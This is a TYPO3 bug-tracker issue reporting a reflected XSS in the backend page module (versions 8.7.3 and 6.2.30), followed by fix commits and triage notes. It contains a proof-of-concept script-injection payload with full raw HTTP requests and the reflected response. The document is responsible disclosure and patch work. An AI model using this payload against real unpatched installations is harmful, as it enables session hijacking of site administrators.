Bug #82077

XSS in page module

Added by Oliver Hader about 2 years ago. Updated 12 months ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2017-08-10
Due date:
% Done:

100%

TYPO3 Version:
6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

For the attention of the TYPO3 security team,

I would like to inform you about a security issue that I have found on the cms TYPO3 (checked on versions 8.7.3 and 6.2.30).

Specifically that versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for the pages which are configured to show the content from other pages.

Technical Details =================
Below is descripted the scenario to reproduce the security issue.

Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to the "Edit Page". After select the "Appaerance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page and finally save it.

At this point in the "Edit Page" area for the aforementioned page will appear a blue rectangle with inside a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.

Proof of Concept:
To replicate the issue is sufficient to click the aforementioned new link (for the 8.7.3 it have the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").

And so grab the GET request which is being passed to the server and add the payload in the URL query, so the submitted payload is reflected on the correspondent response body.

EXAMPLE (attached there is a screenshot of the PoC)
Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

ORIGINAL REQUEST:
--------------------------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT

PoC REQUEST:
------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
-------------
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body">
Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a>
</div></div></div></div>
[...]

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on:
TYPO3/8.7.3
TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")

Associated revisions

Revision 1fa553da (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53719
Tested-by: TYPO3com <>
Reviewed-by: Wolfgang Klinger <>
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

Revision 45bdf473 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53733
Tested-by: TYPO3com <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

Revision 68a17881 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53734
Tested-by: TYPO3com <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

History

#1 Updated by Oliver Hader about 2 years ago

  • Category set to OW-A07: Cross Site Scripting

#2 Updated by Gerrit Code Review about 2 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53700

#3 Updated by Helmut Hummel about 2 years ago

  • Project changed from Core Security to TYPO3 Core
  • Category deleted (OW-A07: Cross Site Scripting)

This is reflected(non persitent) XSS, which means, to exploit this, you need to trick others to follow the link.
However in this case the link contains a CSRF token, which cannot be known by the attacker.

While this is a valid bug, which needs to be fixed, it is not reasonably exploitable. We can therefore fix this within our public bug fixing process

#4 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53719

#5 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53733

#6 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100

#7 Updated by Gerrit Code Review about 2 years ago

  • Status changed from Resolved to Under Review

Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53734

#8 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved

#9 Updated by Benni Mack 12 months ago

  • Status changed from Resolved to Closed

Also available in: Atom PDF